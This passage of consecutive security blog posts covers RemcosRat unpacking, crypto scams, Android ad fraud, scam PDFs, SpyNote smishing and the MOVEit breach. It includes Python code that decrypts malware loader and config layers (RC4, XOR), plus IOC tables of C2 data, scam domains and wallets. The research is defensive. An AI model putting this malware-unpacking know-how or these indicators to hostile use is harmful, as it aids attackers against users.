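Every layer in this chain is unlocked by one of two trivial stream ciphers: RC4 (the single-byte key 0xD7 for the MSIL loader's reversed hex blob, “uQExKBCIDisposablev” for the SykCrypter resource, and the 76-byte key for the Remcos SETTINGS resource) or a positional XOR (key byte 170 for SykCrypter's string table). The Python below is an added example written for this post, not McAfee's or the malware's code; it implements both ciphers plus the unpacking steps around them and checks that a decrypted blob really is a PE image. All test data is constructed by running the same transforms forward on known plaintext. Two details the page does not show are assumptions, flagged in the code: how SykCrypter combines the key byte with the index, and the SETTINGS layout of a length byte followed by the key and then the ciphertext.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same call."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    S = list(range(256))
    j = 0
    for i in range(256):                       # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for b in data:                             # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decrypt_loader_blob(text_hex: str, key_byte: int = 0xD7) -> bytes:
    """MSIL loader stage: hex string -> bytes -> reverse -> RC4 with a 1-byte key."""
    return rc4(bytes([key_byte]), bytes.fromhex(text_hex)[::-1])


def xor_index_decode(data: bytes, key: int = 170) -> bytes:
    """SykCrypter string table. The page says 'XOR with 170 and the current
    index'; how the two combine is not shown, so byte ^ key ^ (i & 0xFF) is an
    assumption made for this example. XOR is its own inverse."""
    return bytes(b ^ key ^ (i & 0xFF) for i, b in enumerate(data))


def decrypt_remcos_settings(resource: bytes) -> tuple:
    """Remcos 'SETTINGS' RCData, assumed layout: [key_len][key][rc4 ciphertext].
    Returns (key, plaintext) so the key length (76 in the sample) can be checked."""
    key_len = resource[0]
    key = resource[1:1 + key_len]
    return key, rc4(key, resource[1 + key_len:])


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check that a decrypted blob is a PE image: MZ, then PE at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


# ---- constructed test data: forward transforms of known plaintext ----
FAKE_PE = b"MZ" + b"\0" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\0\0" + b"payload"
LOADER_TEXT = rc4(bytes([0xD7]), FAKE_PE)[::-1].hex().upper()   # uppercase, as in the loader

STRING_TABLE = xor_index_decode(b"vsserv\0bdagent\0", 170)

SETTINGS_KEY = bytes(range(1, 77))                               # 76 bytes, like the sample
SETTINGS_RES = bytes([len(SETTINGS_KEY)]) + SETTINGS_KEY + rc4(
    SETTINGS_KEY, b"172.96.14.18:2404|Rmc-OB0RTV")              # placeholder config text

if __name__ == "__main__":
    print(looks_like_pe(decrypt_loader_blob(LOADER_TEXT)))
    print(xor_index_decode(STRING_TABLE).split(b"\0"))
    print(decrypt_remcos_settings(SETTINGS_RES)[1])
```

When the key is carried in the same resource as the ciphertext, as here, the cipher offers no secrecy at all; its only purpose is to keep the C2 address and process-name list out of a plain strings dump. A config extractor for this family is therefore just resource parsing plus RC4.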
RemcosRat is a complex multi-stage threat. McAfee Labs unpacked how this malware downloads and executes VBS and PowerShell scripts, how it unwraps each layer, and how it finally delivers the Remcos remote access payload. At McAfee, we are committed to providing our customers with robust and effective threat defense that detects and protects against threats like RemcosRat and many other families. Our security software uses a combination of signature, machine learning, threat intelligence and behavioral-based detection techniques to identify and stop threats to keep you safe.
SHA256 | Filetype |
0b3d65305edc50d3882973e47e9fbf4abc1f04eaecb13021f434eba8adf80b67 | VBS |
3ed5729dc3f12a479885e434e0bdb7722f8dd0c0b8b27287111564303b98036c | PowerShell |
1035dbc121b350176c06f72311379b230aaf791b01c7091b45e4c902e9aba3f4 | MSIL loader |
32c8993532bc4e1f16e86c70c0fac5d51439556b8dcc6df647a2288bc70b8abf | SykCrypter |
61c72e0dd15ea3de383e908fdb25c6064a5fa84842d4dbf7dc49b9a01be30517 | Remcos Payload |
The post Peeling Back the Layers of RemcosRat Malware appeared first on McAfee Blog.
Authored by: Neil Tyagi
Scam artists know no bounds—and that also applies to stealing your cryptocurrency. Crypto scams are like any other financial scam, except the scammers are after your crypto assets rather than your cash.
Crypto scammers reuse many tactics from other financial crimes, such as pump-and-dump schemes that lure investors into buying an asset on the strength of fake claims about its value, alongside outright theft of digital assets.
This time scammers were trying to get an investor to send a digital asset as a form of payment for a fraudulent transaction.
It starts with a tweet used as bait to lure cryptocurrency investors into purchasing a non-existent token supposedly tied to a well-known company, SpaceX.
The lure is the sale of an “official” SpaceX cryptocurrency. The image above also shows the tweet's wide reach (224.4K views).
McAfee+ provides all-in-one online protection for your identity, privacy, and security. With McAfee+, you’ll feel safer online because you’ll have the tools, guidance, and support to take the steps to be safer online. McAfee protects against these types of scam sites with Web Advisor protection that detects malicious websites.
The link present in this tweet redirects to space[-]launch[.]net, which is already marked as malicious by McAfee.
A WHOIS lookup shows the site sits behind Cloudflare. Cloudflare has increasingly become the first choice of scammers for hosting malicious websites and shielding their infrastructure.
The registrant details in the WHOIS record are redacted, as expected.
Clicking the link leads to a login page that asks for SpaceX credentials; it doubles as a phishing page for anyone who actually holds a SpaceX account.
Visitors without SpaceX credentials can use the signup link instead.
After logging in, the site redirects to a landing page where one can purchase the supposedly official cryptocurrency launched by SpaceX.
The page impersonates an official SpaceX portal for buying the token, complete with SpaceX branding.
The picture above shows the FOMO (fear of missing out) lever: a countdown timer claims the fake tokens can only be bought for the next 10 hours. The short window also helps the scam finish before most security vendors have flagged the site.
The site accepts payment in about 22 cryptocurrencies, most prominently Bitcoin, Ethereum and USDT.
The scammers even offer a bonus of fake SpaceX tokens to anyone who buys at least a minimum amount.
Here we can find the scammers' BTC wallet address and look up the transactions related to it.
The scammers' wallet addresses for the other currencies are listed in the IOC table at the end of this post.
Looking at the on-chain transactions for these addresses confirms that people have fallen for the scam and sent payments. The Bitcoin wallet above has collected around 2,780 US dollars; the three most recent incoming transactions are visible.
Similarly, the Ethereum wallet has collected around 1,450 US dollars.
We looked at two popular cryptocurrencies, but the scammers operate about 22 different wallets.
Crypto phishing scams constantly evolve, and new tactics emerge regularly. Users should take the initiative to educate themselves about the latest phishing techniques and scams targeting the cryptocurrency community. Also, stay informed by researching and reading about recent phishing incidents and security best practices.
Domain | Crypto Type | Wallet address |
space[-]launch[.]net | BTC | bc1qhhec8pkhj2cxtk6u0dace8terq22hspxkr5pee |
space[-]launch[.]net | USDT | 398a9BF5fe5fc6CaBB4a8Be8B428138BC7356EC1 |
space[-]launch[.]net | ETH | 16a243E3392Ffd9A872F3fD90dE79Fe7266452F9 |
space[-]launch[.]net | XRP | rnmj4xsaaEaGvFbrsg3wCR6Hp2ZvgjMizF |
space[-]launch[.]net | DASH | XxD3tJ7RA81mZffKFiycASMiDsUdqjLFD1 |
space[-]launch[.]net | BCH | qr45csehwfm5uu9xu4mqpptsvde46t8ztqkzjlww68 |
space[-]launch[.]net | USDC | 0x398a9BF5fe5fc6CaBB4a8Be8B428138BC7356EC1 |
The post Crypto Scam: SpaceX Tokens for Sale appeared first on McAfee Blog.
Authored by SangRyol Ryu, McAfee Threat Researcher
We live in a world where advertisements are everywhere, and it’s no surprise that users are becoming tired of them. By contrast, developers are driven by profit and seek to incorporate more advertisements into their apps. However, there exist certain apps that manage to generate profit without subjecting users to the annoyance of ads. Is this really good?
Recently, McAfee’s Mobile Research Team discovered a concerning practice among some apps distributed through Google Play. These apps load ads while the device’s screen is off, which might at first seem convenient for users. It is, however, a clear violation of the Google Play Developer policy on how ads may be displayed. It hurts the advertisers, who pay for ads nobody sees, and it hurts users: it drains the battery, consumes mobile data, and brings risks such as information leakage and the corruption of user profiling caused by the hidden clicker behavior.
The team identified 43 apps that were collectively downloaded 2.5 million times. The affected apps include TV/DMB players, music downloaders, news and calendar applications. McAfee is a member of the App Defense Alliance, which focuses on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem. We reported the discovered apps to Google, which took prompt action: most are no longer available on Google Play, and the others have been updated by their developers. McAfee Mobile Security detects this threat as Android/Clicker. For more information, and to get fully protected, visit McAfee Mobile Security.
Many affected apps
This ad fraud library uses specific tactics to avoid detection and inspection. It deliberately delays the initiation of its fraudulent activities, creating a latent period from the time of installation. What’s more, all the intricate configurations of this library can be remotely modified and pushed using Firebase Storage or Messaging service. These factors significantly add to the complexity of identifying and analyzing this fraudulent behavior. Notably, the latent period typically spans several weeks, which makes it challenging to detect.
Getting latent period by using Firebase Messaging Service
It is important to think about the implications of granting permissions such as exclusion from power saving (battery optimization) and ‘draw over other apps’. These permissions let an app keep working discreetly in the background, which raises questions about the intentions of the applications or libraries asking for them. Beyond showing ads in the background, the same permissions can support more malicious behavior, such as displaying phishing pages on top of other apps.
Asked permissions to run in the background and keep it hidden
Once the latent period has passed and the device screen is turned off, the library starts fetching and loading ads, so users never see them running. It first registers device information with a domain unique to each application (for example, mppado.oooocooo.com), then fetches the specific advertisement URL from Firebase Storage and loads the ad. All of this consumes power and mobile data.
Observed traffic when the screen is off
If users quickly turn on their screens at this point, they might catch a glimpse of the ad before it is automatically closed.
Example of an advertising site displayed when the screen is off
In conclusion, users should be cautious and carefully weigh whether an app really needs permissions such as power-saving exclusion or ‘draw over other apps’ before granting them. Some legitimate background features do require them, but they also enable hidden behavior, and in this case the hidden clicker activity degrades the relevance of the ads and content that users are later shown. McAfee Mobile Security products help users safeguard their devices and reduce the risks of this kind of malware. For more information, visit McAfee Mobile Security.
best.7080music.com
m.gooogoole.com
barocom.mgooogl.com
newcom.mgooogl.com
easydmb.mgooogl.com
freekr.mgooogl.com
fivedmb.mgooogl.com
krlive.mgooogl.com
sixdmb.mgooogl.com
onairshop.mgooogle.com
livedmb.mgooogle.com
krbaro.mgooogle.com
onairlive.mgooogle.com
krdmb.mgooogle.com
onairbest.ocooooo.com
dmbtv.ocooooo.com
ringtones.ocooooo.com
onairmedia.ocooooo.com
onairnine.ocooooo.com
liveplay.oocooooo.com
liveplus.oocooooo.com
liveonair.oocooooo.com
eightonair.oocooooo.com
krmedia.oocooooo.com
kronair.oocooooo.com
newkrbada.ooooccoo.com
trot.ooooccoo.com
thememusic.ooooccoo.com
goodkrsea.ooooccoo.com
krlive.ooooccoo.com
news.ooooccoo.com
bestpado.ooooccoo.com
krtv.oooocooo.com
onairbaro.oooocooo.com
barolive.oooocooo.com
mppado.oooocooo.com
dmblive.oooocooo.com
baromedia.oooocooo.com
musicbada.oouooo.com
barolive.oouooo.com
sea.oouooo.com
blackmusic.oouooo.com
Package Name | Application Name | SHA256 | Google Play Downloads |
band.kr.com | DMB TV | f3e5aebdbd5cd94606211b04684730656e0eeb1d08f4457062e25e7f05d1c2d1 | 10,000+ |
com.dmb.media | DMB TV | 6aaaa6f579f6a1904dcf38315607d6a5a2ca15cc78920743cf85cc4b0b892050 | 100,000+ |
dmb.onair.media | DMB TV | a98c5170da2fdee71b699ee145bfe4bdcb586b623bbb364a93bb8bdf8dbc4537 | 10,000+ |
easy.kr | DMB TV | 5ec8244b2b1f516fd96b0574dc044dd40076ff7aa7dadb02dfefbd92fc3774bf | 100,000+ |
kr.dmb.onair | DMB TV | e81c0fef52065864ee5021e1d4c7c78d6a407579e1d48fc4cf5551ff0540fdb8 | 5,000+ |
livedmb.kr | DMB TV | 33e5606983526757fef2f6c1da26474f4f9bf34e966d3c204772de45f42a6107 | 50,000+ |
stream.kr.com | DMB TV | a13e26bce41f601a9fafdec8003c5fd14908856afbab63706b133318bc61b769 | 100+ |
com.breakingnews.player | 뉴스 속보 | d27b8e07b7d79086af2fa805ef8d77ee51d86a02d81f2b8236febb92cb9b242d | 10,000+ |
jowonsoft.android.calendar | 달력 | 46757b1f785f2b3cec2906a97597b7db4bfba168086b60dd6d58d5a8aef9e874 | 10,000+ |
com.music.free.bada | 뮤직다운 | a3fe9f9b531ab6fe79ed886909f9520a0d0ae98cf11a98f061dc179800aa5931 | 100,000+ |
com.musicdown | 뮤직다운 | 5f8eb3f86fc608f9de495ff0e65b866a78c25a9260da04ebca461784f039ba16 | 5,000+ |
new.kr.com | 뮤직다운 | 397373c39352ef63786fe70923a58d26cdf9b23fa662f3133ebcbc0c5b837b66 | 100,000+ |
baro.com | 바로TV | 3b4302d00e21cbf691ddb20b55b045712bad7fa71eb570dd8d3d41b8d16ce919 | 10,000+ |
baro.live.tv | 바로TV | 760aa1a6c0d1e8e4e2d3258e197ce704994b24e8edfd48ef7558454893796ebe | 50,000+ |
baro.onair.media | 바로TV | b83a346e18ca20ac5165bc1ce1c8807e89d05abc6a1df0adc3f1f0ad4bb5cd0c | 10,000+ |
kr.baro.dmb | 바로TV | 84a4426b1f8ea2ddb66f12ef383a0762a011d98ff96c27a0122558babdaf0765 | 100,000+ |
kr.live | 바로TV | cccfdf95f74add21da546a03c8ec06c7832ba11091c6d491b0aadaf0e2e57bcc | 1,000+ |
newlive.com | 바로TV | c76af429fabcfd73066302eeb9dd1235fd181583e6ee9ee9015952e20b4f65bf | 50,000+ |
onair.baro.media | 바로TV | 6c61059da2ae3a8d130c50295370baad13866d7e5dc847f620ad171cc01a39e9 | 10,000+ |
freemusic.ringtone.player | 벨소리 무료다운 | 75c74e204d5695c75209b74b10b3469babec1f7ef84c7a7facb5b5e91be0ae3e | 100,000+ |
com.app.allplayer | 실시간 TV | 8d881890cfa071f49301cfe9add6442d633c01935811b6caced813de5c6c6534 | 50,000+ |
com.onair.shop | 실시간 TV | 1501dd8267240b0db0ba00e7bde647733230383d6b67678fc6f0c7f3962bd0d3 | 50,000+ |
eight.krdmb.onair | 실시간 TV | bbd6ddbfee7482fe3fe8b5d96f3be85e09352711a36cd8cf88cfdeaf6ff90c79 | 10,000+ |
free.kr | 실시간 TV | 5f864aa88de07a10045849a7906f616d079eef94cd463e40036760f712361f79 | 10,000+ |
kr.dmb.nine | 실시간 TV | ea49ad38dd7500a6ac12613afe705eb1a4bcab5bcd77ef24f2b9a480a34e4f46 | 100,000+ |
kr.live.com | 실시간 TV | f09cff8a05a92ddf388e56ecd66644bf88d826c5b2a4419f371721429c1359a7 | 10,000+ |
kr.live.onair | 실시간 TV | e8d2068d086d376f1b78d9e510a873ba1abd59703c2267224aa58d3fca2cacbd | 100,000+ |
kr.live.tv | 실시간 TV | 1b64283e5d7e91cae91643a7dcdde74a188ea8bde1cf745159aac76a3417346e | 50,000+ |
kr.media.onair | 실시간 TV | bd0ac9b7717f710e74088df480bde629e54289a61fc23bee60fd0ea560d39952 | 100,000+ |
kr.onair.media | 실시간 TV | d7dd4766043d4f7f640c7c3fabd08b1a7ccbb93eba88cf766a0de008a569ae4d | 1,000+ |
live.kr.onair | 실시간 TV | b84b22bc0146f48982105945bbab233fc21306f0f95503a1f2f578c1149d7e46 | 10,000+ |
live.play.com | 실시간 TV | 516032d21edc2ef4fef389d999df76603538d1bbd9d357a995e3ce4f274a9922 | 50,000+ |
new.com | 실시간 TV | 5d07a113ce389e430bab70a5409f5d7ca261bcdb47e4d8047ae7f3507f044b08 | 50,000+ |
newlive.kr | 실시간 TV | afc8c1c6f74abfadd8b0490b454eebd7f68c7706a748e4f67acb127ce9772cdb | 100,000+ |
onair.best | 실시간 TV | 6234eadfe70231972a4c05ff91be016f7c8af1a8b080de0085de046954c9e8e7 | 50,000+ |
com.m.music.free | 음악다운 | ded860430c581628ea5ca81a2f0f0a485cf2eeb9feafe5c6859b9ecc54a964b2 | 500,000+ |
good.kr.com | 음악다운 | bede67693a6c9a51889f949a83ff601b1105c17c0ca5904906373750b3802e91 | 100,000+ |
new.music.com | 음악다운 | fee6cc8b606cf31e55d85a7f0bf7751e700156ce5f7376348e3357d3b4ec0957 | 1,000+ |
play.com.apps | 음악다운 | b2c1caab0e09b4e99d5d5fd403c506d93497ddb2de3e32931237550dbdbe7f06 | 100,000+ |
com.alltrot.player | 트로트 노래모음 | 469792f4b9e4320faf0746f09ebbcd8b7cd698a04eef12112d1db03b426ff70c | 50,000+ |
com.trotmusic.player | 트로트 노래모음 | 879014bc1e71d7d14265e57c46c2b26537a81020cc105a030f281b1cc43aeb77 | 5,000+ |
best.kr.com | 파도 MP3 | f2bbe087c3b4902a199710a022adf8b57fd927acac0895ab85cfd3e61c376ea5 | 100,000+ |
com.pado.music.mp3 | 파도 MP3 | 9c84c91f28eadd0a93ef055809ca3bceb10a283955c9403ef1a39373139d59f2 | 100,000+ |
The post Invisible Adware: Unveiling Ad Fraud Targeting Android Users appeared first on McAfee Blog.
Authored by: Lakshya Mathur and Yashvi Shah
As the Back-to-School season approaches, scammers are taking advantage of the opportunity to deceive parents and students with various scams. With the increasing popularity of online shopping and digital technology, people are more inclined to make purchases online. Scammers have adapted to this trend and are now using social engineering tactics, such as offering high discounts, free school kits, online lectures, and scholarships, to entice unsuspecting individuals into falling for their schemes.
McAfee Labs has found the following PDFs targeting back-to-school trends. This blog is a reminder for parents on what to educate their children on and how not to fall victim to such fraud.
McAfee Labs encountered a PDF file campaign featuring a fake CAPTCHA on its first page, to verify human interaction. The second page contained substantial content on back-to-school advice for parents and students, giving the appearance of a legitimate document. These tactics were employed to make the PDF seem authentic, entice consumers to click on the fake CAPTCHA link, and evade detection.
Figure 1 – Fake CAPTCHA and scammy link
Figure 2 – PDF Second Page
Figure 3 – Zoomed in content from Figure 2
As shown in Figure 1, there is a fake captcha image that, when clicked, redirects to a URL displayed at the bottom left of the figure. This URL has a Russian domain and goes through multiple redirections before reaching its destination. The scam URL contains the text “all hallows prep school uniform,” and leads to a malicious site that sets cookies, monitors user behavior, and collects interactions, sending the data to servers owned by the domain’s operators.
Figures 2 and 3 show the second page of the PDF, written to look legitimate both to users and to spam and security scanners.
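The dangerous part of a PDF like this is not code but a link: the CAPTCHA picture is a /Link annotation whose /URI action carries the scam URL. Pulling those URIs out is the quickest triage step and needs no PDF library. The Python below is an added example written for this post, not McAfee's code. It regex-extracts /URI actions from a PDF's uncompressed objects, handling both literal strings (with PDF's backslash and octal escapes) and hex strings, and defangs the results for an IOC table. The minimal PDF it runs on is constructed inline, since the real samples are identified above only by hash, and the URLs in it are placeholders on documentation domains.

```python
import re
from urllib.parse import urlsplit

# /URI followed by a literal string ( ... ) or a hex string < ... >. Literal
# strings may hold backslash escapes and one level of balanced parentheses,
# which covers real-world links.
URI_RE = re.compile(
    rb"/URI\s*(?:\(((?:[^()\\]|\\.|\([^()]*\))*)\)|<([0-9A-Fa-f\s]*)>)",
    re.DOTALL,
)

PDF_ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f",
               b"(": b"(", b")": b")", b"\\": b"\\"}


def unescape_literal(s: bytes) -> bytes:
    """Resolve PDF literal-string escapes: \\n, \\(, \\\\ and \\ddd octal."""
    out = bytearray()
    i = 0
    while i < len(s):
        c = s[i:i + 1]
        if c != b"\\":
            out += c
            i += 1
            continue
        nxt = s[i + 1:i + 2]
        if len(nxt) == 1 and nxt in b"01234567":
            digits = re.match(rb"[0-7]{1,3}", s[i + 1:]).group(0)
            out.append(int(digits, 8))
            i += 1 + len(digits)
        else:
            out += PDF_ESCAPES.get(nxt, nxt)   # unknown escape: keep the char
            i += 2
    return bytes(out)


def extract_uris(pdf: bytes) -> list:
    """Every /URI target found in uncompressed objects, in file order."""
    uris = []
    for m in URI_RE.finditer(pdf):
        if m.group(1) is not None:
            raw = unescape_literal(m.group(1))
        else:
            h = re.sub(rb"\s", b"", m.group(2)).decode("ascii")
            if len(h) % 2:                     # PDF lets a final hex digit be omitted
                h += "0"
            raw = bytes.fromhex(h)
        uris.append(raw.decode("latin-1"))
    return uris


def defang(url: str) -> str:
    """Make a URL safe to paste into a report: hxxp scheme, bracketed dots in host."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if not parts.scheme or not host:
        return url.replace(".", "[.]")
    rest = url[len(parts.scheme) + 3:]         # drop 'scheme://'
    return parts.scheme.replace("http", "hxxp") + "://" + rest.replace(host, host.replace(".", "[.]"), 1)


def triage(pdf: bytes) -> list:
    """(defanged URL, top-level domain) per link, ready for an IOC table."""
    rows = []
    for u in extract_uris(pdf):
        host = urlsplit(u).hostname or ""
        rows.append((defang(u), host.rsplit(".", 1)[-1] if "." in host else ""))
    return rows


# Constructed minimal PDF: one link written as a literal string with escapes,
# one as a hex string. Placeholder URLs, not the campaign's real ones.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Annots [4 0 R 5 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Link /Rect [100 600 300 650]
   /A << /S /URI /URI (http://captcha-check.example/verify?q=all\\(hallows\\)+prep+school+uniform) >> >> endobj
5 0 obj << /Type /Annot /Subtype /Link /Rect [100 500 300 550]
   /A << /S /URI /URI <687474703A2F2F6578616D706C652E6F72672F > >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for row in triage(SAMPLE_PDF):
        print(row)
```

The regex only sees objects stored in the clear. PDFs that pack their annotations into compressed object streams must be normalised first (for example with `qpdf --qdf --object-streams=disable in.pdf out.pdf`) before scanning, or the links will be missed entirely.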
In this campaign, we identified a total of 13 domains, with 11 being of Russian origin and 2 from South Africa. You can find the complete list of these domains in the final IOC (Indicators of Compromise) section.
All domains were created between 2020 and 2021 and use Cloudflare’s name servers.
These domains were discovered operating worldwide, targeting consumers across various countries. The United States and India stood out as the top countries where users were most often targeted.
Figure 4 – Geographical distribution of all the scam domains
This campaign is only the beginning of back-to-school scam season. Parents and students should remain vigilant against fraud, such as:
Filetype/URL | Value |
PDF (SHA256) | 474987c34461cb4bd05b81d040cae468ca5b88e891da4d944191aa819a86ff21 |
PDF (SHA256) | 426ad19eb929d0214254340f3809648cfb0ee612c8374748687f5c119ab1a238 |
PDF (SHA256) | 5cb6ecc4af42075fa822d2888c82feb2053e67f77b3a6a9db6501e5003694aba |
Domain | traffine[.]ru |
Domain | leonvi[.]ru |
Domain | trafffi[.]ru |
Domain | norin[.]co[.]za |
Domain | gettraff[.]ru |
Domain | cctraff[.]ru |
Domain | luzas.yubit[.]co[.]za |
Domain | ketchas[.]ru |
Domain | maypoin[.]ru |
Domain | getpdf[.]pw |
Domain | traffset[.]ru |
Domain | jottigo[.]ru |
Domain | trafffe[.]ru |
The post The Season of Back to School Scams appeared first on McAfee Blog.
Authored by: Vallabh Chole and Yerko Grbic
On July 23rd, 2023, Elon Musk announced that the social networking site Twitter was rebranding as “X”. The news put Twitter and X in the headlines and made them the top trending topics on popular social media platforms.
Scammers pounced on this opportunity and started renaming various hacked YouTube and other social media accounts to “twitter-x” and “twitter fund” to promote scam links with new X branding.
Figure 1. Twitter-X-themed YouTube Live Stream by scammer
Figure 2. Twitter X Crypto Scam
This type of scam has been active for some time and uses an inventive approach to lure victims. To make the scam look authentic, the attackers first target well-known influencers with sponsorship emails whose attachments are password-stealing malware. When the stealer runs, the influencer’s session cookies (the access tokens that keep them logged in) are stolen and uploaded to attacker-controlled systems, which lets the scammers take over the accounts without needing the passwords or a second factor.
Figure 3. Malware Flow Chart
After the influencer’s account has been compromised, the scammer renames the channel, in this case to “Twitter CEO”, and starts live-streaming an Elon Musk video on YouTube, posting links to the new scam sites in the chat; accounts with large subscriber counts are the preferred targets. On other platforms such as Instagram and Twitter, compromised accounts are used to follow users and post screenshots with captions like “Thanks Mr.Elon”; a search for these terms on Instagram turns up thousands of similar posts. Compromised accounts are also used to post videos promoting software and game downloads that are really malware masquerading as legitimate software or games. These videos show how to download and execute the files, which are common password-stealing malware distributed through compromised social media accounts.
McAfee+ provides all-in-one online protection for your identity, privacy, and security. With McAfee+, you’ll feel safer online because you’ll have the tools, guidance, and support to take the steps to be safer online. McAfee protects against these types of scam sites with Web Advisor protection that detects malicious websites.
Figure 4. McAfee WebAdvisor detection
Below is a detection heatmap for scam URLs using the twitter-x theme to promote crypto scams.
Figure 5. Scam URL Detection Heatmap
Figure 6. Password stealer Heatmap
Scam Site | Crypto Type | Wallet |
twitter-x[.]org | ETH | 0xB1706fc3671115432eC9a997F802aC79CD7f378a |
twitter-x[.]org | BTC | 1KtgaAjBETdcXiAdGsXJMePT4AEGWqtsug |
twitter-x[.]org | USDT | 0xB1706fc3671115432eC9a997F802aC79CD7f378a |
twitter-x[.]org | DOGE | DLCmD43eZ6hPxZVzc8C7eUL4w8TNrBMw9J |
The post Scammers Follow the Rebranding of Twitter to X, to Distribute Malware appeared first on McAfee Blog.
Authored by Yukihiro Okutomi
McAfee’s Mobile team observed a smishing campaign in early June 2023 that targeted Japanese Android users while posing as power and water utility companies. The campaign ran only briefly, starting June 7. The SMS messages warn of a payment problem to lure victims to a phishing website that installs the remote-controlled SpyNote malware. Cybercriminals have traditionally impersonated financial institutions; here they chose public utilities, whose service-suspension notices create urgency and push victims to act immediately. Protect your Android and iOS mobile devices with McAfee Mobile Security.
A phishing SMS message impersonating a power or water supplier claims a payment problem, as shown in the screenshot below. The URL in the message directs the victim to a phishing website to download mobile malware.
Notice of suspension of power transmission because of non-payment of charges from a power company in Tokyo (Source: Twitter)
Notice of suspension of water supply because of non-payment of charges from a water company in Tokyo (Source: Twitter)
When the URL is opened in a mobile browser, the site starts downloading the malware and the browser shows an installation confirmation dialog.
The confirmation dialog of Spyware installation via browser (Source: Twitter)
SpyNote is a known malware family that proliferated after its source code was leaked in October 2022. More recently it was used in a campaign targeting financial institutions in January 2023 and in one targeting Bank of Japan customers in April 2023.
SpyNote is remotely controlled spyware that abuses Accessibility services and device administrator privileges. It steals device information and sensitive user data such as the device location, contacts, incoming and outgoing SMS messages, and phone calls. To look genuine, the malware disguises itself with the icons of legitimate apps.
Application Icons disguised by malware.
After launching the malware, the app opens a fake settings screen and prompts the user to enable the Accessibility feature. When the user clicks the arrow at the bottom of the screen, the system Accessibility service settings screen is displayed.
A fake setting screen (left), system setting screen (center and right)
Once the Accessibility service is granted, the malware disables battery optimization so that it can keep running in the background, and silently grants itself permission to install from unknown sources so that it can install additional malware without the user’s knowledge. Besides spying on the victim’s device, it also steals two-factor authentication codes from Google Authenticator, as well as Gmail and Facebook information, from the infected device.
Although the distribution method is different, the step of requesting Accessibility service after launching the app is similar to the case of the Bank of Japan that occurred in April.
Scammers keep up with current events and impersonate well-known companies that have a reason to reach out to their customers. The SpyNote attack discovered this time targets users of mobile apps for essential infrastructure services such as electricity and water. One reason is that electric and water bills, which used to be issued on paper, are now managed through websites and mobile apps. If you want to learn about smishing, consult this article “What Is Smishing? Here’s How to Spot Fake Texts and Keep Your Info Safe”. McAfee Mobile Security detects this threat as Android/SpyNote, alerts mobile users if it is present, and protects them from data loss. For more information, visit McAfee Mobile Security.
C2 Server:
Malware Samples:
SHA256 Hash | Package name | Application name
--- | --- | ---
075909870a3d16a194e084fbe7a98d2da07c8317fcbfe1f25e5478e585be1954 | com.faceai.boot | キャリア安全設定
e2c7d2acb56be38c19980e6e2c91b00a958c93adb37cb19d65400d9912e6333f | com.faceai.boot | 東京電力
a532c43202c98f6b37489fb019ebe166ad5f32de5e9b395b3fc41404bf60d734 | com.faceai.boot | 東京電力TEPCO
cb9e6522755fbf618c57ebb11d88160fb5aeb9ae96c846ed10d6213cdd8a4f5d | com.faceai.boot | 東京電力TEPCO
59cdbe8e4d265d7e3f4deec3cf69039143b27c1b594dbe3f0473a1b7f7ade9a6 | com.faceai.boot | 東京電力TEPCO
8d6e1f448ae3e00c06983471ee26e16f6ab357ee6467b7dce2454fb0814a34d2 | com.faceai.boot | 東京電力TEPCO
5bdbd8895b9adf39aa8bead0e3587cc786e375ecd2e1519ad5291147a8ca00b6 | com.faceai.boot | 東京電力TEPCO
a6f9fa36701be31597ad10e1cec51ebf855644b090ed42ed57316c2f0b57ea3c | com.faceai.boot | 東京電力TEPCO
f6e2addd189bb534863afeb0d06bcda01d0174f5eac6ee4deeb3d85f35449422 | com.faceai.boot | 東京電力TEPCO
755585571f47cd71df72af0fad880db5a4d443dacd5ace9cc6ed7a931cb9c21d | com.faceai.boot | 東京電力TEPCO
2352887e3fc1e9070850115243fad85c6f1b367d9e645ad8fc7ba28192d6fb85 | com.faceai.boot | 東京電力TEPCO
90edb28b349db35d32c0190433d3b82949b45e0b1d7f7288c08e56ede81615ba | com.faceai.boot | 東京電力TEPCO
513dbe3ff2b4e8caf3a8040f3412620a3627c74a7a79cce7d9fab5e3d08b447b | com.faceai.boot | 東京電力TEPCO
0fd87da37712e31d39781456c9c1fef48566eee3f616fbcb57a81deb5c66cbc1 | com.faceai.boom | 東京水道局アプリ
acd36f7e896e3e3806114d397240bd7431fcef9d7f0b268a4e889161e51d802b | com.faceai.boom | 東京水道局アプリ
91e2f316871704ad7ef1ec74c84e3e4e41f557269453351771223496d5de594e | com.faceai.boom | 東京水道局アプリ
The post Android SpyNote attacks electric and water public utility users in Japan appeared first on McAfee Blog.
Authored by: Abhishek Karnik and Oliver Devane
You may have heard recently in the news that several organizations, including banks, federal agencies, and corporate entities, have suffered data breaches due to a series of ransomware attacks initiated by the Clop hacker group (aka CLOP, CL0p), that leveraged a vulnerability in MOVEit software.
Three critical vulnerabilities (CVE-2023-34362, CVE-2023-35036 and CVE-2023-35708) have been reported in the software. However, the group is only known to have leveraged one of them, CVE-2023-34362, to obtain unauthorized access to sensitive data. The vulnerabilities are exploitable through a structured query language (SQL) injection attack that gives attackers access to databases hosted by the MOVEit application.
